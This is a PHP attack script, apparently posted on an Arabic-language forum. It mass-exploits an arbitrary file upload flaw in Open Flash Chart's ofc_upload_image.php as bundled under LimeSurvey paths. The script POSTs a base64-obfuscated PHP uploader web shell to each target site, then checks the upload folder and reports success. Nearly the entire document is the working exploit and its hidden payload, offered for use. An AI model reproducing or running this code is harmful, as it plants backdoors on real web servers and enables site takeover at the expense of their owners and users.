كود:
<form method='POST'>
<center>
<input type='text' name='name' value='cyb.php'>
<input type='submit' value='OK' name='OK'><br><br>
<textarea name='situs' cols='45' rows='1'>http://target.com/</textarea>
</center>
</form>
<?
@set_time_limit(0);
$site = explode("\r\n", $_POST['situs']);
$namafile = $_POST['name'];
$path = array('/lime/limewizard/_scripts/openflashchart/php-ofc-library/ofc_upload_image.php');
$nama = array("/lime/limewizard/_scripts/openflashchart/tmp-upload-images/");
$uploader = base64_decode("PD9waHANCmVjaG8gJzx0aXRsZT5VcGxvYWQgRmlsZXMgfCBjeWIucGhwPC90aXRsZT4nOw0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOw0KaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgew0KCWlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPlVwbG9hZCBzdWNjZXNzISEhPC9iPjxicj48YnI+JzsgfQ0KCWVsc2UgeyBlY2hvICc8Yj5VcGxvYWQgZmFpbGVkICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+");
$options = array('http' => array('method'=> "POST",'header'=> "Content-type: text/plain\r\n", 'content'=> $uploader));
$context = stream_context_create($options);
if($_POST['OK'])
{
foreach($site as $situs)
{
foreach($path as $upload)
{
$fopen = @fopen("{$situs}{$upload}?name={$namafile}", 'r', false, $context);
}
foreach($nama as $namas)
{
$url = "{$situs}{$namas}{$namafile}";
$check = @file_get_contents($url);
if(eregi("cyb.php", $check))
{
echo "<center><font face='Tahoma' color='Green' size='2'>[+] Exploit success => {$situs}/{$namas}/{$namafile} <br /></center>";
flush();
}
}
}
}
echo "<center><font face='Tahoma' color='Red' size='2'>[+] coded by Cyb3Rm0uJah3D</font></center>";
?>